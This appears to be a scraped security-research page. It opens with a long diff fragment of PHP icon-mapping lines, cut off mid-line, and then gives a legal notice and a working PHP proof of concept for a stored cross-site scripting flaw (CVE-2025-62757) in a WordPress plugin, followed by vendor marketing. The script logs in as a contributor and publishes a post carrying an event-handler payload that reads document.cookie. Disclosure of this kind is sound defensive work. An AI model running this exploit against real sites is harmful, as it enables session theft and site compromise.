-$icons['linode']                              = array( 'char' => 'f2b8', 'class' => 'linode' );
-$icons['linux']                               = array( 'char' => 'f17c', 'class' => 'linux' );
-$icons['list-alt']                            = array( 'char' => 'e88e', 'class' => 'list-alt' );
-$icons['list-bullet']                         = array( 'char' => 'f0ca', 'class' => 'list-bullet' );
-$icons['list-numbered']                       = array( 'char' => 'f0cb', 'class' => 'list-numbered' );
-$icons['list']                                = array( 'char' => 'e887', 'class' => 'list' );
-$icons['location']                            = array( 'char' => 'e83a', 'class' => 'location' );
-$icons['lock-open-alt']                       = array( 'char' => 'f13e', 'class' => 'lock-open-alt' );
-$icons['lock-open']                           = array( 'char' => 'e823', 'class' => 'lock-open' );
-$icons['lock']                                = array( 'char' => 'e822', 'class' => 'lock' );
-$icons['login']                               = array( 'char' => 'e845', 'class' => 'login' );
-$icons['logout']                              = array( 'char' => 'e846', 'class' => 'logout' );
-$icons['low-vision']                          = array( 'char' => 'f2a8', 'class' => 'low-vision' );
-$icons['magic']                               = array( 'char' => 'f0d0', 'class' => 'magic' );
-$icons['magnet']                              = array( 'char' => 'e898', 'class' => 'magnet' );
-$icons['mail-alt']                            = array( 'char' => 'f0e0', 'class' => 'mail-alt' );
-$icons['mail-squared']                        = array( 'char' => 'f199', 'class' => 'mail-squared' );
-$icons['mail']                                = array( 'char' => 'e803', 'class' => 'mail' );
-$icons['male']                                = array( 'char' => 'f183', 'class' => 'male' );
-$icons['map-o']                               = array( 'char' => 'f278', 'class' => 'map-o' );
-$icons['map-pin']                             = array( 'char' => 'f276', 'class' => 'map-pin' );
-$icons['map-signs']                           = array( 'char' => 'f277', 'class' => 'map-signs' );
-$icons['map']                                 = array( 'char' => 'f279', 'class' => 'map' );
-$icons['mars-double']                         = array( 'char' => 'f227', 'class' => 'mars-double' );
-$icons['mars-stroke-h']                       = array( 'char' => 'f22b', 'class' => 'mars-stroke-h' );
-$icons['mars-stroke-v']                       = array( 'char' => 'f22a', 'class' => 'mars-stroke-v' );
-$icons['mars-stroke']                         = array( 'char' => 'f229', 'class' => 'mars-stroke' );
-$icons['mars']                                = array( 'char' => 'f222', 'class' => 'mars' );
-$icons['maxcdn']                              = array( 'char' => 'f136', 'class' => 'maxcdn' );
-$icons['meanpath']                            = array( 'char' => 'f20c', 'class' => 'meanpath' );
-$icons['medium']                              = array( 'char' => 'f23a', 'class' => 'medium' );
-$icons['medkit']                              = array( 'char' => 'f0fa', 'class' => 'medkit' );
-$icons['meetup']                              = array( 'char' => 'f2e0', 'class' => 'meetup' );
-$icons['megaphone']                           = array( 'char' => 'e89c', 'class' => 'megaphone' );
-$icons['meh']                                 = array( 'char' => 'f11a', 'class' => 'meh' );
-$icons['menu']                                = array( 'char' => 'f0c9', 'class' => 'menu' );
-$icons['mercury']                             = array( 'char' => 'f223', 'class' => 'mercury' );
-$icons['mic']                                 = array( 'char' => 'f130', 'class' => 'mic' );
-$icons['microchip']                           = array( 'char' => 'f2db', 'class' => 'microchip' );
-$icons['minus-circled']                       = array( 'char' => 'e81c', 'class' => 'minus-circled' );
-$icons['minus-squared-alt']                   = array( 'char' => 'f147', 'class' => 'minus-squared-alt' );
-$icons['minus-squared']                       = array( 'char' => 'f146', 'class' => 'minus-squared' );
-$icons['minus']                               = array( 'char' => 'e81b', 'class' => 'minus' );
-$icons['mixcloud']                            = array( 'char' => 'f289', 'class' => 'mixcloud' );
-$icons['mobile']                              = array( 'char' => 'f10b', 'class' => 'mobile' );
-$icons['modx']                                = array( 'char' => 'f285', 'class' => 'modx' );
-$icons['money']                               = array( 'char' => 'f0d6', 'class' => 'money' );
-$icons['moon']                                = array( 'char' => 'f186', 'class' => 'moon' );
-$icons['motorcycle']                          = array( 'char' => 'f21c', 'class' => 'motorcycle' );
-$icons['mouse-pointer']                       = array( 'char' => 'f245', 'class' => 'mouse-pointer' );
-$icons['move']                                = array( 'char' => 'f047', 'class' => 'move' );
-$icons['music']                               = array( 'char' => 'e801', 'class' => 'music' );
-$icons['mute']                                = array( 'char' => 'f131', 'class' => 'mute' );
-$icons['neuter']                              = array( 'char' => 'f22c', 'class' => 'neuter' );
-$icons['newspaper']                           = array( 'char' => 'f1ea', 'class' => 'newspaper' );
-$icons['object-group']                        = array( 'char' => 'f247', 'class' => 'object-group' );
-$icons['object-ungroup']                      = array( 'char' => 'f248', 'class' => 'object-ungroup' );
-$icons['odnoklassniki-square']                = array( 'char' => 'f264', 'class' => 'odnoklassniki-square' );
-$icons['odnoklassniki']                       = array( 'char' => 'f263', 'class' => 'odnoklassniki' );
-$icons['off']                                 = array( 'char' => 'e88c', 'class' => 'off' );
-$icons['ok-circled2']                         = array( 'char' => 'e815', 'class' => 'ok-circled2' );
-$icons['ok-circled']                          = array( 'char' => 'e814', 'class' => 'ok-circled' );
-$icons['ok-squared']                          = array( 'char' => 'f14a', 'class' => 'ok-squared' );
-$icons['ok']                                  = array( 'char' => 'e813', 'class' => 'ok' );
-$icons['opencart']                            = array( 'char' => 'f23d', 'class' => 'opencart' );
-$icons['openid']                              = array( 'char' => 'f19b', 'class' => 'openid' );
-$icons['opera']                               = array( 'char' => 'f26a', 'class' => 'opera' );
-$icons['optin-monster']                       = array( 'char' => 'f23c', 'class' => 'optin-monster' );
-$icons['pagelines']                           = array( 'char' => 'f18c', 'class' => 'pagelines' );
-$icons['paper-plane-empty']                   = array( 'char' => 'f1d9', 'class' => 'paper-plane-empty' );
-$icons['paper-plane']                         = array( 'char' => 'f1d8', 'class' => 'paper-plane' );
-$icons['paragraph']                           = array( 'char' => 'f1dd', 'class' => 'paragraph' );
-$icons['paste']                               = array( 'char' => 'f0ea', 'class' => 'paste' );
-$icons['pause-circle-o']                      = array( 'char' => 'f28c', 'class' => 'pause-circle-o' );
-$icons['pause-circle']                        = array( 'char' => 'f28b', 'class' => 'pause-circle' );
-$icons['pause']                               = array( 'char' => 'e86c', 'class' => 'pause' );
-$icons['paw']                                 = array( 'char' => 'f1b0', 'class' => 'paw' );
-$icons['paypal']                              = array( 'char' => 'f1ed', 'class' => 'paypal' );
-$icons['pencil-squared']                      = array( 'char' => 'f14b', 'class' => 'pencil-squared' );
-$icons['pencil']                              = array( 'char' => 'e831', 'class' => 'pencil' );
-$icons['percent']                             = array( 'char' => 'f295', 'class' => 'percent' );
-$icons['phone-squared']                       = array( 'char' => 'f098', 'class' => 'phone-squared' );
-$icons['phone']                               = array( 'char' => 'e83f', 'class' => 'phone' );
-$icons['picture']                             = array( 'char' => 'e80d', 'class' => 'picture' );
-$icons['pied-piper-alt']                      = array( 'char' => 'f1a8', 'class' => 'pied-piper-alt' );
-$icons['pied-piper-squared']                  = array( 'char' => 'f1a7', 'class' => 'pied-piper-squared' );
-$icons['pied-piper']                          = array( 'char' => 'f2ae', 'class' => 'pied-piper' );
-$icons['pin']                                 = array( 'char' => 'e824', 'class' => 'pin' );
-$icons['pinterest-circled']                   = array( 'char' => 'f0d2', 'class' => 'pinterest-circled' );
-$icons['pinterest-squared']                   = array( 'char' => 'f0d3', 'class' => 'pinterest-squared' );
-$icons['pinterest']                           = array( 'char' => 'f231', 'class' => 'pinterest' );
-$icons['play-circled2']                       = array( 'char' => 'e86a', 'class' => 'play-circled2' );
-$icons['play-circled']                        = array( 'char' => 'f144', 'class' => 'play-circled' );
-$icons['play']                                = array( 'char' => 'e869', 'class' => 'play' );
-$icons['plug']                                = array( 'char' => 'f1e6', 'class' => 'plug' );
-$icons['plus-circled']                        = array( 'char' => 'e81a', 'class' => 'plus-circled' );
-$icons['plus-squared-alt']                    = array( 'char' => 'f196', 'class' => 'plus-squared-alt' );
-$icons['plus-squared']                        = array( 'char' => 'f0fe', 'class' => 'plus-squared' );
-$icons['plus']                                = array( 'char' => 'e819', 'class' => 'plus' );
-$icons['podcast']                             = array( 'char' => 'f2ce', 'class' => 'podcast' );
-$icons['pound']                               = array( 'char' => 'f154', 'class' => 'pound' );
-$icons['print']                               = array( 'char' => 'e833', 'class' => 'print' );
-$icons['product-hunt']                        = array( 'char' => 'f288', 'class' => 'product-hunt' );
-$icons['puzzle']                              = array( 'char' => 'f12e', 'class' => 'puzzle' );
-$icons['qq']                                  = array( 'char' => 'f1d6', 'class' => 'qq' );
-$icons['qrcode']                              = array( 'char' => 'e88f', 'class' => 'qrcode' );
-$icons['question-circle-o']                   = array( 'char' => 'f29c', 'class' => 'question-circle-o' );
-$icons['quora']                               = array( 'char' => 'f2c4', 'class' => 'quora' );
-$icons['quote-left']                          = array( 'char' => 'f10d', 'class' => 'quote-left' );
-$icons['quote-right']                         = array( 'char' => 'f10e', 'class' => 'quote-right' );
-$icons['ravelry']                             = array( 'char' => 'f2d9', 'class' => 'ravelry' );
-$icons['rebel']                               = array( 'char' => 'f1d0', 'class' => 'rebel' );
-$icons['recycle']                             = array( 'char' => 'f1b8', 'class' => 'recycle' );
-$icons['reddit-alien']                        = array( 'char' => 'f281', 'class' => 'reddit-alien' );
-$icons['reddit-squared']                      = array( 'char' => 'f1a2', 'class' => 'reddit-squared' );
-$icons['reddit']                              = array( 'char' => 'f1a1', 'class' => 'reddit' );
-$icons['registered']                          = array( 'char' => 'f25d', 'class' => 'registered' );
-$icons['renren']                              = array( 'char' => 'f18b', 'class' => 'renren' );
-$icons['reply-all']                           = array( 'char' => 'f122', 'class' => 'reply-all' );
-$icons['reply']                               = array( 'char' => 'f112', 'class' => 'reply' );
-$icons['resize-full-alt']                     = array( 'char' => 'f0b2', 'class' => 'resize-full-alt' );
-$icons['resize-full']                         = array( 'char' => 'e84d', 'class' => 'resize-full' );
-$icons['resize-horizontal']                   = array( 'char' => 'e850', 'class' => 'resize-horizontal' );
-$icons['resize-small']                        = array( 'char' => 'e84e', 'class' => 'resize-small' );
-$icons['resize-vertical']                     = array( 'char' => 'e84f', 'class' => 'resize-vertical' );
-$icons['retweet']                             = array( 'char' => 'e834', 'class' => 'retweet' );
-$icons['right-big']                           = array( 'char' => 'e85f', 'class' => 'right-big' );
-$icons['right-circled2']                      = array( 'char' => 'f18e', 'class' => 'right-circled2' );
-$icons['right-circled']                       = array( 'char' => 'f0a9', 'class' => 'right-circled' );
-$icons['right-dir']                           = array( 'char' => 'e858', 'class' => 'right-dir' );
-$icons['right-hand']                          = array( 'char' => 'e861', 'class' => 'right-hand' );
-$icons['right-open']                          = array( 'char' => 'e85b', 'class' => 'right-open' );
-$icons['right']                               = array( 'char' => 'f178', 'class' => 'right' );
-$icons['road']                                = array( 'char' => 'e88d', 'class' => 'road' );
-$icons['rocket']                              = array( 'char' => 'f135', 'class' => 'rocket' );
-$icons['rouble']                              = array( 'char' => 'f158', 'class' => 'rouble' );
-$icons['rss-squared']                         = array( 'char' => 'f143', 'class' => 'rss-squared' );
-$icons['rss']                                 = array( 'char' => 'f09e', 'class' => 'rss' );
-$icons['rupee']                               = array( 'char' => 'f156', 'class' => 'rupee' );
-$icons['safari']                              = array( 'char' => 'f267', 'class' => 'safari' );
-$icons['scissors']                            = array( 'char' => 'e88a', 'class' => 'scissors' );
-$icons['scribd']                              = array( 'char' => 'f28a', 'class' => 'scribd' );
-$icons['search']                              = array( 'char' => 'e802', 'class' => 'search' );
-$icons['sellsy']                              = array( 'char' => 'f213', 'class' => 'sellsy' );
-$icons['server']                              = array( 'char' => 'f233', 'class' => 'server' );
-$icons['share-squared']                       = array( 'char' => 'f1e1', 'class' => 'share-squared' );
-$icons['share']                               = array( 'char' => 'f1e0', 'class' => 'share' );
-$icons['shekel']                              = array( 'char' => 'f20b', 'class' => 'shekel' );
-$icons['shield']                              = array( 'char' => 'f132', 'class' => 'shield' );
-$icons['ship']                                = array( 'char' => 'f21a', 'class' => 'ship' );
-$icons['shirtsinbulk']                        = array( 'char' => 'f214', 'class' => 'shirtsinbulk' );
-$icons['shopping-bag']                        = array( 'char' => 'f290', 'class' => 'shopping-bag' );
-$icons['shopping-basket']                     = array( 'char' => 'f291', 'class' => 'shopping-basket' );
-$icons['shower']                              = array( 'char' => 'f2cc', 'class' => 'shower' );
-$icons['shuffle']                             = array( 'char' => 'e868', 'class' => 'shuffle' );
-$icons['sign-language']                       = array( 'char' => 'f2a7', 'class' => 'sign-language' );
-$icons['signal']                              = array( 'char' => 'e875', 'class' => 'signal' );
-$icons['simplybuilt']                         = array( 'char' => 'f215', 'class' => 'simplybuilt' );
-$icons['sitemap']                             = array( 'char' => 'f0e8', 'class' => 'sitemap' );
-$icons['skyatlas']                            = array( 'char' => 'f216', 'class' => 'skyatlas' );
-$icons['skype']                               = array( 'char' => 'f17e', 'class' => 'skype' );
-$icons['slack']                               = array( 'char' => 'f198', 'class' => 'slack' );
-$icons['sliders']                             = array( 'char' => 'f1de', 'class' => 'sliders' );
-$icons['slideshare']                          = array( 'char' => 'f1e7', 'class' => 'slideshare' );
-$icons['smile']                               = array( 'char' => 'f118', 'class' => 'smile' );
-$icons['snapchat-ghost']                      = array( 'char' => 'f2ac', 'class' => 'snapchat-ghost' );
-$icons['snapchat-square']                     = array( 'char' => 'f2ad', 'class' => 'snapchat-square' );
-$icons['snapchat']                            = array( 'char' => 'f2ab', 'class' => 'snapchat' );
-$icons['snowflake-o']                         = array( 'char' => 'f2dc', 'class' => 'snowflake-o' );
-$icons['soccer-ball']                         = array( 'char' => 'f1e3', 'class' => 'soccer-ball' );
-$icons['sort-alt-down']                       = array( 'char' => 'f161', 'class' => 'sort-alt-down' );
-$icons['sort-alt-up']                         = array( 'char' => 'f160', 'class' => 'sort-alt-up' );
-$icons['sort-down']                           = array( 'char' => 'f0dd', 'class' => 'sort-down' );
-$icons['sort-name-down']                      = array( 'char' => 'f15e', 'class' => 'sort-name-down' );
-$icons['sort-name-up']                        = array( 'char' => 'f15d', 'class' => 'sort-name-up' );
-$icons['sort-number-down']                    = array( 'char' => 'f163', 'class' => 'sort-number-down' );
-$icons['sort-number-up']                      = array( 'char' => 'f162', 'class' => 'sort-number-up' );
-$icons['sort-up']                             = array( 'char' => 'f0de', 'class' => 'sort-up' );
-$icons['sort']                                = array( 'char' => 'f0dc', 'class' => 'sort' );
-$icons['soundcloud']                          = array( 'char' => 'f1be', 'class' => 'soundcloud' );
-$icons['space-shuttle']                       = array( 'char' => 'f197', 'class' => 'space-shuttle' );
-$icons['spinner']                             = array( 'char' => 'f110', 'class' => 'spinner' );
-$icons['spoon']                               = array( 'char' => 'f1b1', 'class' => 'spoon' );
-$icons['spotify']                             = array( 'char' => 'f1bc', 'class' => 'spotify' );
-$icons['stackexchange']                       = array( 'char' => 'f18d', 'class' => 'stackexchange' );
-$icons['stackoverflow']                       = array( 'char' => 'f16c', 'class' => 'stackoverflow' );
-$icons['star-empty']                          = array( 'char' => 'e807', 'class' => 'star-empty' );
-$icons['star-half-alt']                       = array( 'char' => 'f123', 'class' => 'star-half-alt' );
-$icons['star-half']                           = array( 'char' => 'e808', 'class' => 'star-half' );
-$icons['star']                                = array( 'char' => 'e806', 'class' => 'star' );
-$icons['steam-squared']                       = array( 'char' => 'f1b7', 'class' => 'steam-squared' );
-$icons['steam']                               = array( 'char' => 'f1b6', 'class' => 'steam' );
-$icons['stethoscope']                         = array( 'char' => 'f0f1', 'class' => 'stethoscope' );
-$icons['sticky-note-o']                       = array( 'char' => 'f24a', 'class' => 'sticky-note-o' );
-$icons['sticky-note']                         = array( 'char' => 'f249', 'class' => 'sticky-note' );
-$icons['stop-circle-o']                       = array( 'char' => 'f28e', 'class' => 'stop-circle-o' );
-$icons['stop-circle']                         = array( 'char' => 'f28d', 'class' => 'stop-circle' );
-$icons['stop']                                = array( 'char' => 'e86b', 'class' => 'stop' );
-$icons['street-view']                         = array( 'char' => 'f21d', 'class' => 'street-view' );
-$icons['strike']                              = array( 'char' => 'f0cc', 'class' => 'strike' );
-$icons['stumbleupon-circled']                 = array( 'char' => 'f1a3', 'class' => 'stumbleupon-circled' );
-$icons['stumbleupon']                         = array( 'char' => 'f1a4', 'class' => 'stumbleupon' );
-$icons['subscript']                           = array( 'char' => 'f12c', 'class' => 'subscript' );
-$icons['subway']                              = array( 'char' => 'f239', 'class' => 'subway' );
-$icons['suitcase']                            = array( 'char' => 'f0f2', 'class' => 'suitcase' );
-$icons['sun']                                 = array( 'char' => 'f185', 'class' => 'sun' );
-$icons['superpowers']                         = array( 'char' => 'f2dd', 'class' => 'superpowers' );
-$icons['superscript']                         = array( 'char' => 'f12b', 'class' => 'superscript' );
-$icons['table']                               = array( 'char' => 'f0ce', 'class' => 'table' );
-$icons['tablet']                              = array( 'char' => 'f10a', 'class' => 'tablet' );
-$icons['tag']                                 = array( 'char' => 'e827', 'class' => 'tag' );
-$icons['tags']                                = array( 'char' => 'e828', 'class' => 'tags' );
-$icons['target']                              = array( 'char' => 'e874', 'class' => 'target' );
-$icons['tasks']                               = array( 'char' => 'f0ae', 'class' => 'tasks' );
-$icons['taxi']                                = array( 'char' => 'f1ba', 'class' => 'taxi' );
-$icons['telegram']                            = array( 'char' => 'f2c6', 'class' => 'telegram' );
-$icons['television']                          = array( 'char' => 'f26c', 'class' => 'television' );
-$icons['tencent-weibo']                       = array( 'char' => 'f1d5', 'class' => 'tencent-weibo' );
-$icons['terminal']                            = array( 'char' => 'f120', 'class' => 'terminal' );
-$icons['text-height']                         = array( 'char' => 'e881', 'class' => 'text-height' );
-$icons['text-width']                          = array( 'char' => 'e882', 'class' => 'text-width' );
-$icons['th-large']                            = array( 'char' => 'e810', 'class' => 'th-large' );
-$icons['th-list']                             = array( 'char' => 'e812', 'class' => 'th-list' );
-$icons['th']                                  = array( 'char' => 'e811', 'class' => 'th' );
-$icons['themeisle']                           = array( 'char' => 'f2b2', 'class' => 'themeisle' );
-$icons['thermometer-0']                       = array( 'char' => 'f2cb', 'class' => 'thermometer-0' );
-$icons['thermometer-2']                       = array( 'char' => 'f2c9', 'class' => 'thermometer-2' );
-$icons['thermometer-3']                       = array( 'char' => 'f2c8', 'class' => 'thermometer-3' );
-$icons['thermometer-quarter']                 = array( 'char' => 'f2ca', 'class' => 'thermometer-quarter' );
-$icons['thermometer']                         = array( 'char' => 'f2c7', 'class' => 'thermometer' );
-$icons['thumbs-down-alt']                     = array( 'char' => 'f165', 'class' => 'thumbs-down-alt' );
-$icons['thumbs-down']                         = array( 'char' => 'e82c', 'class' => 'thumbs-down' );
-$icons['thumbs-up-alt']                       = array( 'char' => 'f164', 'class' => 'thumbs-up-alt' );
-$icons['thumbs-up']                           = array( 'char' => 'e82b', 'class' => 'thumbs-up' );
-$icons['ticket']                              = array( 'char' => 'f145', 'class' => 'ticket' );
-$icons['tint']                                = array( 'char' => 'e893', 'class' => 'tint' );
-$icons['to-end-alt']                          = array( 'char' => 'e86e', 'class' => 'to-end-alt' );
-$icons['to-end']                              = array( 'char' => 'e86d', 'class' => 'to-end' );
-$icons['to-start-alt']                        = array( 'char' => 'e870', 'class' => 'to-start-alt' );
-$icons['to-start']                            = array( 'char' => 'e86f', 'class' => 'to-start' );
-$icons['toggle-off']                          = array( 'char' => 'f204', 'class' => 'toggle-off' );
-$icons['toggle-on']                           = array( 'char' => 'f205', 'class' => 'toggle-on' );
-$icons['trademark']                           = array( 'char' => 'f25c', 'class' => 'trademark' );
-$icons['train']                               = array( 'char' => 'f238', 'class' => 'train' );
-$icons['transgender-alt']

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-62757 - WebMan Amplifier <= 1.5.12 - Authenticated (Contributor+) Stored Cross-Site Scripting

<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_pass';

// Payload: Icon class with JavaScript event handler
$malicious_icon_class = 'fa-user" onmouseover="alert(document.cookie)';

// Step 1: Authenticate and obtain WordPress nonce
$login_url = $target_url . '/wp-login.php';
$admin_url = $target_url . '/wp-admin/';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $admin_url,
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$response = curl_exec($ch);

// Step 2: Extract nonce from post editor page (required for saving)
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php');
$response = curl_exec($ch);

// Extract nonce using regex (simplified for PoC)
preg_match('/_wpnonce" value="([a-f0-9]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';

// Step 3: Create a new post with malicious icon shortcode
$post_url = $target_url . '/wp-admin/post.php';
$post_data = [
    'post_title' => 'XSS Test Post',
    'content' => '[wm_icon icon="' . $malicious_icon_class . '"]',
    'post_type' => 'post',
    'post_status' => 'publish',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => '/wp-admin/post-new.php',
    'publish' => 'Publish'
];

curl_setopt($ch, CURLOPT_URL, $post_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$response = curl_exec($ch);

// Step 4: Verify payload was stored
if (strpos($response, 'Post published') !== false || strpos($response, 'Post updated') !== false) {
    echo "[+] Payload injected successfully. Visit any page containing the icon shortcode to trigger XSS.n";
    
    // Extract post ID from response
    preg_match('/post=([0-9]+)&/', $response, $post_matches);
    if (!empty($post_matches[1])) {
        echo "[+] Post URL: " . $target_url . '/?p=' . $post_matches[1] . "n";
    }
} else {
    echo "[-] Injection failed. Check authentication and permissions.n";
}

curl_close($ch);

?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School